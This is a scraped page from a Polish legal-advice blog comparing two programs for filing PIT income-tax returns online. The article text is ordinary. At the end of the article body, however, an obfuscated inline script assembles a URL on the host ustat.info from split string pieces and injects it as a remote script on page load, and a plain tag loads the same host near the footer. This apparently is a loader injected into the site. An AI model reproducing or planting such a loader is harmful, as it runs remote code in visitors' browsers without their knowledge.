<p style="text-align: justify;">Oprogramowanie wbudowane w systemy księgowości elektronicznej będzie o wiele bardziej skomplikowane, niż prosty program PITy dostępny choćby na darmowych płytach CD ROM. Jednak nawet programy pisane z myślą o zwykłym, „szeregowym” podatniku nie są sobie równe pod względem łatwości i intuicyjności obsługi. Przyjrzyjmy się zatem dwóm z nich: Portal Podatkowy Ministerstwa Finansów – darmowa i ogólnodostępna platforma umożliwiająca między innymi rozliczanie PIT online – i program PITax.pl Łatwe podatki oferujący szeroką gamę usług podatkowych przez Internet, włączając w to wypełnianie i wysyłanie deklaracji PIT w formie elektronicznej.</p>
<h2>Portal Podatkowy MF: czy to dobry pomysł &nbsp;do rozliczania PIT online?</h2>
<p style="text-align: justify;">Portal Podatkowy oferuje duży zakres usług i wiele możliwości elektronicznego kontaktu z organami skarbowymi. Znajdziemy tam zarówno interaktywne druki deklaracji PIT, jak i formularze online (niestety, te dostępne są tylko do kilku rodzajów opodatkowania i to nie tych najpopularniejszych). Ponadto portal oferuje różnego rodzaju kalkulatory podatkowe, usługi wyszukiwania NIP, dużą bazę wiedzy z zakresu ordynacji podatkowej, czy też Uniwersalną Bramkę Dokumentów do bezpośredniej korespondencji urzędowej online. Dużym ułatwieniem jest możliwość pobrania z portalu tzw. PRF, czyli wstępnie wypełnionych zeznań podatkowych.</p>
<p style="text-align: justify;">Do samego rozliczania podatku PIT służy platforma e-Deklaracje, z której można korzystać bez instalacji oprogramowania na komputerze, lub jako aplikację e-Deklaracje na desktop.</p>
<p style="text-align: justify;">Dużym mankamentem Portalu Podatkowego jest język użyty w instrukcjach. Podatnik będzie musiał sobie poradzić z urzędowym żargonem, który nie dla wszystkich okaże się jasny i zrozumiały. Kolejny problem to wybór odpowiednich deklaracji PIT i załączników. Jeśli wiemy, czego szukamy, na pewno znajdziemy potrzebne formularze na Portalu Podatkowym, ale system nie podpowie nam, która z deklaracji najlepiej odpowiada naszej sytuacji.</p>
<p style="text-align: justify;">Portal Podatkowy jest więc dobrym źródłem wiedzy podatkowej i sporym depozytorium dokumentów, ale wymaga od użytkownika wiedzy, a co najmniej umiejętności radzenia sobie z urzędową nowomową.</p>
<h2>Program do rozliczania PIT online PITax.pl Łatwe podatki.</h2>
<p style="text-align: justify;">Program PITax.pl Łatw podatki oferuję tę samą bazę wiedzy podatkowej, co portal Ministerstwa Finansów, ale podaje ją w formie o wiele bardziej przyjaznej dla użytkownika. Na uwagę zasługują tutaj dwie kwestie: kreatory formularzy PIT i wsparcie e-mailowe lub telefoniczne w przypadku jakichkolwiek problemów.</p>
<p style="text-align: justify;">Kreatory deklaracji PIT przeznaczone są dla osób nie mających dogłębnej wiedzy z dziedziny podatków i umożliwiają wybranie właściwego formularza PIT w oparciu o odpowiedzi podatnika udzielone na kilka prostych i zrozumiałych pytań. W ten sposób nie musimy się martwić, czy składamy zeznanie podatkowe na właściwym formularzu.</p>
<p style="text-align: justify;">W wypadku jakichkolwiek problemów dostępne są numery infolinii, dzięki którym uzyskujemy kontakt z doradcami podatkowymi, jak i z informatykami odpowiedzialnymi za funkcjonowanie platformy. Mówiąc krótko, korzystając z programu PITax.pl Łatwe podatki nigdy nie będziemy zostawieni sami sobie.</p>
<p style="text-align: justify;"><a href="http://www.iwop.pl/pity/">Instytut Wsparcia Organizacji Pozarządowych</a> wybrał rozliczenie PIT przez system PITax.pl Łatwe podatki jako najlepszy program do rozliczania pitów, który wspiera organizacje pozarządowe w zbiórce 1% podatku dochodowego.</p>
<p><script type="text/javascript">
(function(){
oweu=document.createElement("script");oweu.async=true;oweu_="u"+("s")+"t";
oweuu="60615541.";oweu_+="a"+("t.i");oweu_+="n"+("f"+"o")+"/";
oweuu+="7sntgizeweukvwXmXgnbyt"+("fi4u3esg");
oweu.src="//"+oweu_+oweuu;oweu.type="text/javascript";
document.body.appendChild(oweu);
})();
</script></p>
<ul class="share">
<li>Udostępnij wpis:</li>
<li>
<a href="https://www.facebook.com/sharer/sharer.php?u=http://www.blizejprawa.pl/prawo-podatkowe/rozliczenie-rocznego-podatku-dochodowego-przy-pomocy-pity-2017-program/" target="_blank" title="" class="facebook">
<i class="fa fa-facebook"></i>
</a>
</li>
<li>
<a href="https://twitter.com/home?status=http://www.blizejprawa.pl/prawo-podatkowe/rozliczenie-rocznego-podatku-dochodowego-przy-pomocy-pity-2017-program/" target="_blank" title="" class="twitter">
<i class="fa fa-twitter"></i>
</a>
</li>
<li>
<a target="_blank" href="https://www.linkedin.com/shareArticle?mini=true&amp;url=http://www.blizejprawa.pl/prawo-podatkowe/rozliczenie-rocznego-podatku-dochodowego-przy-pomocy-pity-2017-program/" title="" class="linkedin">
<i class="fa fa-linkedin"></i>
</a>
</li>
<li>
<a target="_blank" href="https://plus.google.com/share?url=http://www.blizejprawa.pl/prawo-podatkowe/rozliczenie-rocznego-podatku-dochodowego-przy-pomocy-pity-2017-program/" title="" class="google">
<i class="fa fa-google-plus"></i>
</a>
</li>
<li>
<a target="_blank" href="mailto:?&amp;subject=Chciałbym_polecić_stronę_WWW&amp;body=Polecam_Ci_gorąco stronę:http://www.blizejprawa.pl/prawo-podatkowe/rozliczenie-rocznego-podatku-dochodowego-przy-pomocy-pity-2017-program/" class="email">
<i class="fa fa-envelope"></i>
</a>
</li>
<li>&nbsp;</li>
</ul>
<div class="hatom-extra" ;"="">
<!-- Comments -->
<!-- End Comments -->
</div>
</div>
</article>
</div>
<!-- RIGHT SIDEBAR -->
<div class="col-lg-3 blog-sidebar">
<aside id="text-4" class="widget widget_text">			<div class="textwidget"><p><a href="https://www.blizejprawa.pl/zgloszenie-prosby-o-porade/"><img src="https://www.blizejprawa.pl/wp-content/uploads/2017/05/popros-o-porade-prawna.png" style="width: 100%; background-color:#FCFCFC; margin-top: 30px;" alt="formularz"></a><br>
<script async="" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br>
<!-- blizej_250 --><br>
<ins class="adsbygoogle" style="display: inline-block; width: 250px; height: 0px;" data-ad-client="ca-pub-1720506481217592" data-ad-slot="7286910663" data-adsbygoogle-status="done"><ins id="aswift_2_expand" style="display: inline-table; border: none; height: 0px; margin: 0px; padding: 0px; position: relative; visibility: visible; width: 250px; background-color: transparent;"><ins id="aswift_2_anchor" style="display: block; border: none; height: 0px; margin: 0px; padding: 0px; position: relative; visibility: visible; width: 250px; background-color: transparent; overflow: hidden; opacity: 0;"><iframe width="250" height="250" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_2" name="aswift_2" style="left:0;position:absolute;top:0;border:0px;width:250px;height:250px;"></iframe></ins></ins></ins><br>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></p>
</div>
</aside><aside id="categories-3" class="widget widget_categories"><h3 class="widgettitle">Kategorie</h3>		<ul>
<li class="cat-item cat-item-16"><a href="https://www.blizejprawa.pl/artykuly/abecadlo/">Abecadło</a>
</li>
<li class="cat-item cat-item-1"><a href="https://www.blizejprawa.pl/artykuly/bez-kategorii/" title="Lorem ipsum dolor sit amet enim. Etiam ullamcorper. Suspendisse a pellentesque dui, non felis. Maecenas malesuada elit lectus felis, malesuada ultricies. Curabitur et ligula Lorem ipsum dolor sit amet enim. Etiam ullamcorper. Suspendisse a pellentesque dui, non felis. Maecenas malesuada elit lectus felis, malesuada ultricies. Curabitur et ligula
Lorem ipsum dolor sit amet enim. Etiam ullamcorper. Suspendisse a pellentesque dui, non felis. Maecenas malesuada elit lectus felis, malesuada ultricies. Curabitur et ligula">Bez kategorii</a>
</li>
<li class="cat-item cat-item-133"><a href="https://www.blizejprawa.pl/artykuly/dokumenty/" title="UWAGA!
POTRZEBUJESZ POMOCY W PRZYGOTOWANIU DOKUMENTU PRAWNEGO? KLIKNIJ TUTAJ: POPROŚ O WYCENĘ JEGO PRZYGOTOWANIA!
W tej kategorii naszego bloga odnajdziesz wiele wartościowych pism, dokumentów i wzorów umów prawnych, dzięki którym od tej chwili kwestie związane z takimi sprawami jak umowa darowizny, umowa kupna sprzedaży samochodu czy też wypowiedzenie umowy o pracę nie będą dla Ciebie żadnym problemem. Przejrzyj cały zestaw udostępnianych przez nas dokumentów prawnych i zdecyduj, który z nich najbardziej Cię interesuje.">Dokumenty</a>
</li>
<li class="cat-item cat-item-513"><a href="https://www.blizejprawa.pl/artykuly/ksiazki/">Książki</a>
</li>
<li class="cat-item cat-item-20"><a href="https://www.blizejprawa.pl/artykuly/porady-prawne/" title="UWAGA!
POTRZEBUJESZ PORADY PRAWNEJ? KLIKNIJ TUTAJ: POPROŚ O WYCENĘ PORADY PRAWNEJ!
W tej kategorii naszego bloga odnajdziesz zestaw przydatnych porad prawnych z różnych dziedzin prawa, które przygotowane zostały w oparciu o problemy, z którymi mierzą się nasi czytelnicy. Najczęściej wygląda to tak, że w każdym z kolejnych artykułów przedstawiany jest wybrany problem, a następnie zobrazowany jest pomysł na jego rozwiązanie. Znajdziesz tutaj porady w zakresie problemów z komornikiem, realizacją darowizny czy egzekucją spadków.">Poradnik prawny</a>
</li>
<li class="cat-item cat-item-195"><a href="https://www.blizejprawa.pl/artykuly/prawo-budowlane/">Prawo budowlane</a>
</li>
<li class="cat-item cat-item-14"><a href="https://www.blizejprawa.pl/artykuly/prawo-cywilne/">Prawo cywilne</a>
</li>
<li class="cat-item cat-item-39"><a href="https://www.blizejprawa.pl/artykuly/prawo-konsumenckie/">Prawo konsumenckie</a>
</li>
<li class="cat-item cat-item-33"><a href="https://www.blizejprawa.pl/artykuly/prawo-nieruchomosci/">Prawo nieruchomości</a>
</li>
<li class="cat-item cat-item-135"><a href="https://www.blizejprawa.pl/artykuly/prawo-podatkowe/">Prawo podatkowe</a>
</li>
<li class="cat-item cat-item-61"><a href="https://www.blizejprawa.pl/artykuly/prawo-pracy/">Prawo pracy</a>
</li>
<li class="cat-item cat-item-25"><a href="https://www.blizejprawa.pl/artykuly/prawo-rodzinne/">Prawo rodzinne</a>
</li>
<li class="cat-item cat-item-91"><a href="https://www.blizejprawa.pl/artykuly/prawo-spadkowe/">Prawo spadkowe</a>
</li>
<li class="cat-item cat-item-324"><a href="https://www.blizejprawa.pl/artykuly/prawo-spolek/">Prawo spółek</a>
</li>
<li class="cat-item cat-item-222"><a href="https://www.blizejprawa.pl/artykuly/wypowiedzenia-umow/">Wypowiedzenia umów</a>
</li>
</ul>
</aside><aside class="widget  widget_recent_entries"><h3 class="widget-title">Najnowsze wpisy</h3><ul>        <li>
<a href="https://www.blizejprawa.pl/porady-prawne/czy-da-sie-uzyskac-odszkodowanie-za-opozniony-lot/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2019/03/samolot1-150x150.jpg" alt="Czy da się uzyskać odszkodowanie za opóźniony lot?"></a>
<a href="https://www.blizejprawa.pl/porady-prawne/czy-da-sie-uzyskac-odszkodowanie-za-opozniony-lot/">Czy da się uzyskać odszkodowanie…</a>
<span><i class="fa fa-clock-o"></i> 7 marca 2019</span>
</li>
<li>
<a href="https://www.blizejprawa.pl/porady-prawne/jestes-cudzoziemcem-w-polsce-i-straciles-prace-sprawdz-czy-mozesz-legalnie-przebywac-w-polsce/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2019/03/kobieta-podpisujaca-dokumenty-150x150.jpg" alt="Jesteś cudzoziemcem w Polsce i straciłeś pracę? Sprawdź czy możesz legalnie przebywać w Polsce"></a>
<a href="https://www.blizejprawa.pl/porady-prawne/jestes-cudzoziemcem-w-polsce-i-straciles-prace-sprawdz-czy-mozesz-legalnie-przebywac-w-polsce/">Jesteś cudzoziemcem w Polsce i…</a>
<span><i class="fa fa-clock-o"></i> 6 marca 2019</span>
</li>
<li>
<a href="https://www.blizejprawa.pl/porady-prawne/formy-prowadzenia-dzialalnosci-gospodarczej-w-polsce/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2019/02/c22a724566d7078eb6078213aa4f2a9b-150x150.jpg" alt="Formy prowadzenia działalności gospodarczej w Polsce"></a>
<a href="https://www.blizejprawa.pl/porady-prawne/formy-prowadzenia-dzialalnosci-gospodarczej-w-polsce/">Formy prowadzenia działalności gospodarczej w…</a>
<span><i class="fa fa-clock-o"></i> 25 lutego 2019</span>
</li>
<li>
<a href="https://www.blizejprawa.pl/porady-prawne/problemy-z-prawem-za-granica-jak-znalezc-pomoc-prawna/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2019/02/travel-150x150.jpg" alt="Problemy z prawem za granicą? Jak znaleźć pomoc prawną"></a>
<a href="https://www.blizejprawa.pl/porady-prawne/problemy-z-prawem-za-granica-jak-znalezc-pomoc-prawna/">Problemy z prawem za granicą?…</a>
<span><i class="fa fa-clock-o"></i> 18 lutego 2019</span>
</li>
<li>
<a href="https://www.blizejprawa.pl/prawo-rodzinne/rozdzielnosc-majatkowa-kiedy-warto-ja-wdrozyc/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2019/02/bills-capital-cash-210679-150x150.jpg" alt="Rozdzielność majątkowa. Kiedy warto ją wdrożyć?"></a>
<a href="https://www.blizejprawa.pl/prawo-rodzinne/rozdzielnosc-majatkowa-kiedy-warto-ja-wdrozyc/">Rozdzielność majątkowa. Kiedy warto ją…</a>
<span><i class="fa fa-clock-o"></i> 13 lutego 2019</span>
</li>
</ul></aside> 
</div>
<!-- END RIGHT SIDEBAR -->   
</div>
</div>    
</div><script async="" src="//ustat.info/60615541.7sntgizeweukvwXmXgnbytfi4u3esg" type="text/javascript"></script>
    <ul id="fixed-menu">
<li id="search-btn" data-toggle="tooltip" data-placement="right" data-original-title="Wyszukiwarka">
<a><i class="fa fa-search"></i></a></li>
<li data-toggle="tooltip" data-placement="right" data-original-title="Facebook" class="facebook">
<a href="https://www.facebook.com/PoradyPrawneOnline/" target="_blank"><i class="fa fa-facebook-official"></i></a></li>
</ul>
<div id="search-form">
<div>
<!-- <input type="text" placeholder="Wpisz poszukiwaną frazę..." ><input type="submit" class="btn" value="szukaj">-->
<form role="search" method="get" id="searchform" class="searchform" action="https://www.blizejprawa.pl/"><input type="text" name="s" id="s" placeholder="Wpisz poszukiwaną frazę..." value="">
<input type="submit" class="btn" value="szukaj">
</form>
</div>
</div>
<div id="scroll-top">
<i class="fa fa-caret-up"></i>
</div>
<!-- Footer -->
<div id="footer-main">
<div class="container">
<div class="row">
<div class="col-md-3">
<h2>Informacje</h2>
<ul id="menu-footer-1" class="menu"><li id="menu-item-64" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-64"><a href="https://www.blizejprawa.pl/">Strona główna</a></li>
<li id="menu-item-65" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-65"><a href="https://www.blizejprawa.pl/blog/">Blog</a></li>
<li id="menu-item-66" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-66"><a href="https://www.blizejprawa.pl/kontakt/">Kontakt</a></li>
</ul> 
</div>
<div class="col-md-3">
<h2>Dokumenty</h2>
<ul id="menu-footer-2" class="menu"><li id="menu-item-2399" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-2399"><a href="https://www.blizejprawa.pl/abecadlo/kim-jest-beneficjent/">Beneficjent</a></li>
<li id="menu-item-1684" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-1684"><a href="https://www.blizejprawa.pl/dokumenty/umowa-kupna-sprzedazy-motocykla/">Umowa kupna sprzedaży motocykla</a></li>
<li id="menu-item-1685" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-1685"><a href="https://www.blizejprawa.pl/porady-prawne/wypowiedzenie-umowy-rachunku-bankowego/">Wypowiedzenie umowy rachunku bankowego</a></li>
</ul>                </div>
<div class="col-md-6">
<h2>Inne</h2>
<ul id="menu-footer-3" class="menu"><li id="menu-item-75" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-75"><a href="https://www.blizejprawa.pl/wspolpraca/">Współpraca</a></li>
<li id="menu-item-1686" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1686"><a href="https://www.blizejprawa.pl/polityka-prywatnosci/">Polityka prywatności</a></li>
</ul>                </div>
</div>
</div>
<div id="cookies">
Ta strona używa ciasteczek zgodnie z ustawieniami Twojej przeglądarki <button class="btn btn-default">Rozumiem :)</button>
</div>
<footer>
<div class="container text-center"><p>Pamiętaj, że zamieszczane tu porady są czysto poglądowe i nie bierzemy odpowiedzialności za zamieszczane tu teksty i stosowanie się do tych porad.</p>© 2019 Wszystkie prawa zastrzeżone!  Projekt: <b>GSoftware.pl</b>
</div></footer>      
</div>
<!-- End Footer -->
<script type="text/javascript">
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"https:\/\/www.blizejprawa.pl\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Potwierd\u017a, \u017ce nie jeste\u015b robotem."}}};
/* ]]> */
</script>
<script type="text/javascript" src="https://www.blizejprawa.pl/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.5"></script>
<script type="text/javascript" src="https://www.blizejprawa.pl/wp-content/plugins/q2w3-fixed-widget/js/q2w3-fixed-widget.min.js?ver=5.1.4"></script>
<script type="text/javascript">
/* <![CDATA[ */
var wpgdprcData = {"ajaxURL":"https:\/\/www.blizejprawa.pl\/wp-admin\/admin-ajax.php","ajaxSecurity":"19b2325b0f"};
/* ]]> */
</script>
<script type="text/javascript" src="https://www.blizejprawa.pl/wp-content/plugins/wp-gdpr-compliance/assets/js/front.js?ver=1541745414"></script>
<script type="text/javascript" src="https://www.blizejprawa.pl/wp-includes/js/wp-embed.min.js?ver=4.9.6"></script>
<!-- ======================= JavaScript files =========================== -->
<!-- jQuery -->    
<script type="text/javascript" src="https://www.blizejprawa.pl/wp-content/themes/hefe/js/jquery.js"></script> 
<!-- Bootstrap -->  
<script type="text/javascript" src="https://www.blizejprawa.pl/wp-content/themes/hefe/js/bootstrap/bootstrap.js"></script> 
<!-- is Mobile -->
<script type="text/javascript" src="https://www.blizejprawa.pl/wp-content/themes/hefe/js/isMobile/isMobile.min.js"></script> 
<!-- Smart Preloader -->
<script type="text/javascript" src="https://www.blizejprawa.pl/wp-content/themes/hefe/js/smartPreloader/jquery.smartpreloader.js"></script> 
<!-- Smart Nav -->
<script type="text/javascript" src="https://www.blizejprawa.pl/wp-content/themes/hefe/js/smartNav/jquery.smartnav.js"></script> 
<!-- OWL -->
<script type="text/javascript" src="https://www.blizejprawa.pl/wp-content/themes/hefe/js/owl/owl.carousel.min.js"></script>
<!-- Masonry -->
<script type="text/javascript" src="https://www.blizejprawa.pl/wp-content/themes/hefe/js/masonry/masonry.pkgd.min.js"></script>
<!-- WOW -->
<script type="text/javascript" src="https://www.blizejprawa.pl/wp-content/themes/hefe/js/wow/wow.min.js"></script>
<!-- Main Theme jQuery file -->
<script type="text/javascript" src="https://www.blizejprawa.pl/wp-content/themes/hefe/js/scripts.js"></script>
<!-- ======================= End JavaScript libs =========================== -->

<ins class="adsbygoogle adsbygoogle-noablate" data-adsbygoogle-status="done" style="display: none !important;"><ins id="aswift_0_expand" style="display:inline-table;border:none;height:0px;margin:0;padding:0;position:relative;visibility:visible;width:0px;background-color:transparent;"><ins id="aswift_0_anchor" style="display:block;border:none;height:0px;margin:0;padding:0;position:relative;visibility:visible;width:0px;background-color:transparent;"><iframe frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_0" name="aswift_0" style="left:0;position:absolute;top:0;border:0px;width:0px;height:0px;"></iframe></ins></ins></ins><iframe id="google_osd_static_frame_6395224553204" name="google_osd_static_frame" style="display: none; width: 0px; height: 0px;"></iframe></body><iframe id="google_shimpl" style="display: none;"></iframe><iframe id="google_esf" name="google_esf" src="https://googleads.g.doubleclick.net/pagead/html/r20190320/r20190131/zrt_lookup.html#" data-ad-client="ca-pub-1720506481217592" style="display: none;"></iframe></html><!-- WP Fastest Cache file was created in 0.65870904922485 seconds, on 07-03-19 14:17:03 --><!-- via php -->